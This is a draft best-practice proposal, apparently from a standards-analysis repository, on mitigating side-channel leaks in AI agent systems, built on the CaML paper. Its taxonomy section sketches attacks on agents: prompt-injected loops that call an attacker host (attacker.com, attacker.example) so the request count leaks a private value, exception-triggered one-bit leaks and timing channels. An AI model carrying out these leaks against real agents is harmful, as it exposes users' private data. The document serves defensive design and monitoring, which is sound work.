ietf-draft-analyzer/data/reports/draft-proposals/camel-inspired/06-side-channel-mitigation.md
Christian Nennemann 5ec7410b89 feat: proposal intake pipeline with AI-powered generation on /proposals/new
Add full proposal system: DB schema (proposals + proposal_gaps tables),
CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new.
The new page merges AI intake (paste URL/text → Haiku generates multiple
proposals auto-linked to gaps) with manual form entry. Generated proposals
are clickable cards that fill the editor below for refinement.

Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes
CaML-inspired draft proposals from arXiv:2503.18813 analysis.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-09 03:15:11 +01:00


---
title: Side-Channel Mitigation Framework for AI Agent Interactions
draft_name: draft-nennemann-ai-agent-side-channels-00
intended_wg: SECDISPATCH (BCP)
status: outline
gaps_addressed: [89, 93]
camel_sections: [7]
document_type: BCP (Best Current Practice)
date: 2026-03-09
---

Side-Channel Mitigation Framework for AI Agent Interactions

1. Problem Statement

Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — side-channel attacks can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:

  1. External resource inference: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
  2. Exception-based bit leaking: an adversary triggers conditional exceptions that reveal one bit of private data per exception
  3. Timing side-channels: an adversary infers private values from execution timing differences

These attacks are not theoretical: CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in its evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.

This document is a Best Current Practice (BCP) guide for mitigating side-channel risks in AI agent systems.

2. Scope

This document provides:

  1. A taxonomy of side-channel risks specific to AI agent systems
  2. Mitigation strategies for each risk category
  3. Tool API design guidelines that minimize side-channel exposure
  4. Monitoring patterns for detecting side-channel exploitation
  5. STRICT vs. NORMAL mode recommendations

3. Side-Channel Taxonomy

3.1 External Resource Inference

Attack: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts the resulting requests to infer the private value.

CaML context: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var`, and policies can block it.

Bandwidth: up to log₂(max_value) bits per interaction (or more with range-based inference).

Attacker's Server
     │
     │  GET /cat.jpg  ×10  ← private_var = 10
     │  GET /cat.jpg  ×20  ← private_var = 20
     │
     └── attacker infers private_var by counting requests
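The counting attack in the diagram can be simulated end to end. The sketch below is purely illustrative: the `fetch` stub and `request_log` stand in for an attacker-controlled server, and are not CaML code.

```python
request_log = []  # stands in for the attacker's server access log

def fetch(url):
    # Every request is observable to whoever controls the endpoint
    request_log.append(url)

private_var = 10  # the secret the agent holds

# Injected agent code: the loop count depends on the secret
for _ in range(private_var):
    fetch("https://attacker.example/cat.jpg")

# Attacker-side inference: just count the requests
inferred = len(request_log)  # equals private_var: secret recovered
```

No content ever crosses the wire; the information leaks entirely through the request count, which is why payload-level filtering cannot stop this channel.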

3.2 Exception-Based Bit Leaking

Attack: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.

CaML context: The Q-LLM can be influenced to return a value that causes an IndexError (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).

```python
# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10
# ADVERSARY OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception
```

Bandwidth: 1 bit per exception (was the subsequent action observed or not?).

3.3 Timing Side-Channels

Attack: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.

CaML context: CaML's restricted Python subset doesn't include time, but other timing variations (e.g., different code paths for different private values) may still be exploitable.

Bandwidth: depends on timing precision — generally low but non-zero.
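To make the channel concrete, here is a self-contained simulation; the workload size and midpoint-threshold rule are assumptions for illustration, not anything CaML specifies.

```python
import time

def handle(private_bit):
    # The code path, and therefore the running time, depends on the secret
    if private_bit:
        total = sum(i * i for i in range(300_000))  # slow path
    return "ok"  # same visible result either way

def measure(private_bit):
    start = time.perf_counter()
    handle(private_bit)
    return time.perf_counter() - start

# Attacker calibrates a threshold, then reads the bit from timing alone
fast, slow = measure(0), measure(1)
threshold = (fast + slow) / 2
inferred_bit = 1 if measure(1) > threshold else 0
```

Note that the function's return value is identical on both paths; the bit leaks through elapsed time only.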

3.4 Agent-Specific Side Channels (Beyond CaML)

| Channel | Attack Vector | Bandwidth |
|---|---|---|
| Token usage | Private data influences response length → observable token count | Medium |
| Tool selection pattern | Which tools are called reveals information about private data | Medium |
| Error message content | Error details leak through supposedly sanitized channels | High |
| Model confidence | Probability distributions in structured output leak information | Low |
| Resource consumption | CPU/memory usage patterns depend on private data | Low |

4. Mitigation Strategies

4.1 STRICT Mode Execution

Recommendation: Use STRICT mode for all security-sensitive agent operations.

In STRICT mode:

  • All statements inside if/for/while blocks inherit dependencies from the condition/iterator
  • This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph
  • Security policies can detect and block the side-channel

Trade-off: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.
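The STRICT/NORMAL difference can be sketched as a toy label-propagation model. Everything below (the `Tainted` wrapper, the policy predicate) is illustrative and not the CaML implementation:

```python
class Tainted:
    """A value tagged with the set of sources it depends on."""
    def __init__(self, value, deps):
        self.value = value
        self.deps = set(deps)

def policy_allows_fetch(deps):
    # Example policy: block external requests that depend on private data
    return "private_var" not in deps

def run_loop(iterator, mode):
    """Count how many fetch() calls a policy would block inside the loop."""
    # In STRICT mode the loop body inherits the iterator's dependencies;
    # in NORMAL mode it does not, so the side channel is invisible.
    context = iterator.deps if mode == "STRICT" else set()
    blocked = 0
    for _ in range(iterator.value):
        call_deps = set(context)  # fetch() itself carries no data deps
        if not policy_allows_fetch(call_deps):
            blocked += 1
    return blocked

private_var = Tainted(10, {"private_var"})
run_loop(private_var, "NORMAL")  # 0 blocked: the leak goes through
run_loop(private_var, "STRICT")  # 10 blocked: policy sees the dependency
```

The utility cost is visible even in this toy: STRICT blocks every call in the loop, including ones a benign task may have needed.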

4.2 Exception Handling Hardening

Recommendation: Use error-value types instead of exceptions for data-dependent operations.

Exceptions create side channels because they halt execution. Instead:

```python
# VULNERABLE: exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if exception
except:
    pass  # attacker observes: was email sent?

# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data)  # returns Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way
```

Agent frameworks SHOULD:

  • Use Result/Either types instead of exceptions for Processor outputs
  • Ensure both success and failure paths make the same external observations
  • Redact exception messages before they reach the Planner
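The mitigated pattern above presumes a `Result` type; a minimal sketch of one is below. The names, fields, and the `risky_operation` stand-in are illustrative, not a specific library's API.

```python
from dataclasses import dataclass
from typing import Generic, Optional, TypeVar

T = TypeVar("T")

@dataclass
class Result(Generic[T]):
    """Error-value carrier: failures are data, not control flow."""
    value: Optional[T] = None
    error: Optional[str] = None

    def is_ok(self) -> bool:
        return self.error is None

def risky_operation(data: str) -> Result[str]:
    # Hypothetical stand-in: every failure becomes a Result, never an exception
    if not data:
        return Result(error="empty input")
    return Result(value=data.upper())

# Both branches reach the same downstream call, so an observer learns nothing
outcome = risky_operation("secret")
payload = outcome.value if outcome.is_ok() else "default"
```

Because execution never halts, the attacker can no longer read a bit from whether a subsequent tool call happened.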

4.3 Constant-Pattern Tool Calls

Recommendation: Where feasible, make tool call patterns independent of private data.

  • Avoid data-dependent loops that make external calls
  • Use batch operations instead of per-item calls
  • Pad tool call sequences to fixed lengths for sensitive operations
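A minimal sketch of the padding idea, assuming a fixed per-operation call budget; `MAX_CALLS` and the `("send", item)` shape are invented for illustration.

```python
MAX_CALLS = 8  # assumed fixed budget per sensitive operation

def padded_calls(real_items):
    """Pad a data-dependent call sequence to a constant observable length."""
    calls = [("send", item) for item in real_items[:MAX_CALLS]]
    # Dummy calls should be externally indistinguishable from real ones
    calls += [("send", "<padding>")] * (MAX_CALLS - len(calls))
    return calls
```

An external observer always sees exactly `MAX_CALLS` calls, so the sequence length no longer encodes the size of the private input.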

4.4 External Request Restrictions

Recommendation: Restrict which external endpoints agents can contact.

  • Allowlist approved external domains
  • Proxy all external requests through a controlled gateway
  • Rate-limit external requests per agent session
  • Log all external requests for anomaly detection
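All four controls can live in a single egress gateway; the sketch below is illustrative, and the domain list, rate limit, and return-value shape are assumptions.

```python
import time

ALLOWED_DOMAINS = {"api.example.com", "docs.example.org"}  # assumed allowlist
RATE_LIMIT = 5  # assumed max external requests per session

class Gateway:
    """Controlled egress proxy: allowlist + rate limit + full request log."""
    def __init__(self):
        self.log = []
        self.count = 0

    def request(self, domain, path):
        self.log.append((time.time(), domain, path))  # log for anomaly detection
        if domain not in ALLOWED_DOMAINS:
            return ("denied", "domain not allowlisted")
        self.count += 1
        if self.count > RATE_LIMIT:
            return ("denied", "rate limit exceeded")
        return ("allowed", f"https://{domain}{path}")

gw = Gateway()
gw.request("attacker.example", "/cat.jpg")  # denied and logged
```

Denied requests are still logged, since a burst of denials to one domain is itself a useful inference signal for the monitoring layer in Section 6.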

5. Tool API Design Guidelines

Tool developers SHOULD design APIs that minimize side-channel exposure:

5.1 Do

  • Return consistent response structures regardless of input
  • Use fixed-size responses where possible
  • Include provenance metadata in all outputs
  • Document trust levels of output fields (which are public, which are private)

5.2 Don't

  • Return variable-length arrays that depend on private data in observable ways
  • Include internal identifiers in error messages
  • Use response timing that depends on input sensitivity
  • Expose iteration counts or batch sizes in responses

5.3 Tool Capability Annotations

Tools SHOULD declare their side-channel properties:

```json
{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}
```
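One way a runtime might consume such an annotation is sketched below; the decision rule and the never-downgrade policy are assumptions, not a defined algorithm.

```python
def select_mode(annotation):
    """Pick an execution mode from a tool's declared side-channel properties."""
    props = annotation.get("tool:side_channel_properties", {})
    risky = (props.get("makes_external_requests")
             or props.get("observable_by_third_parties"))
    # Honor the tool's recommendation, but never downgrade a risky tool
    recommended = annotation.get("tool:recommended_mode", "STRICT")
    return "STRICT" if risky else recommended

send_email = {
    "tool:name": "send_email",
    "tool:side_channel_properties": {
        "makes_external_requests": True,
        "timing_dependent": False,
        "error_messages_may_leak": True,
        "observable_by_third_parties": True,
    },
    "tool:recommended_mode": "STRICT",
}
select_mode(send_email)  # "STRICT"
```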

6. Monitoring Patterns

6.1 Anomaly Detection Signals

| Signal | Potential Attack | Action |
|---|---|---|
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance > threshold | Timing side-channel | Log + investigate |
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |
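The first two signals can be tracked with very little state. The thresholds below are invented placeholders, not recommended values:

```python
from collections import Counter

class SideChannelMonitor:
    """Tracks repeated-URL and exception-rate signals; thresholds are placeholders."""
    URL_REPEAT_THRESHOLD = 10       # repeated requests to the same URL
    EXCEPTION_RATE_THRESHOLD = 0.2  # exceptions per executed statement
    MIN_STATEMENTS = 20             # don't judge tiny samples

    def __init__(self):
        self.url_counts = Counter()
        self.statements = 0
        self.exceptions = 0

    def on_external_request(self, url):
        self.url_counts[url] += 1
        if self.url_counts[url] > self.URL_REPEAT_THRESHOLD:
            return "rate_limit_and_alert"  # external resource inference
        return "ok"

    def on_statement(self, raised_exception=False):
        self.statements += 1
        self.exceptions += int(raised_exception)
        if (self.statements >= self.MIN_STATEMENTS and
                self.exceptions / self.statements > self.EXCEPTION_RATE_THRESHOLD):
            return "halt_and_review"  # exception-based bit leaking
        return "ok"
```

A real deployment would feed these hooks from the executor and route the returned decisions into the alert/halt path shown in 6.2.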

6.2 Monitoring Architecture

Agent Execution
     │
     ├──► Side-Channel Monitor
     │       ├── Request pattern analyzer
     │       ├── Exception rate tracker
     │       ├── Timing variance detector
     │       └── Tool call pattern validator
     │              │
     │              ▼
     │         Alert / Halt Decision
     │
     ▼
Normal execution continues (if no anomaly)

7. Relationship to Other Drafts

| Draft | Side-Channel Relevance |
|---|---|
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel and needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |

8. Security Considerations

This entire document is about security. Key meta-considerations:

  • Side-channel mitigation is defense in depth — no single measure eliminates all channels
  • The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
  • New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
  • Side-channel monitoring itself can create privacy issues (logging all agent interactions)

9. Open Questions

  1. Formal analysis: can we formally prove bounds on information leakage for a given agent configuration?
  2. Adaptive adversaries: as mitigations are deployed, attackers will find new channels. How to stay ahead?
  3. Overhead budget: what is the acceptable performance overhead for side-channel mitigation?
  4. Multi-agent amplification: do side channels in multi-agent systems compose (leak more than single-agent)?

10. References

  • Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
  • Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
  • Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
  • Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.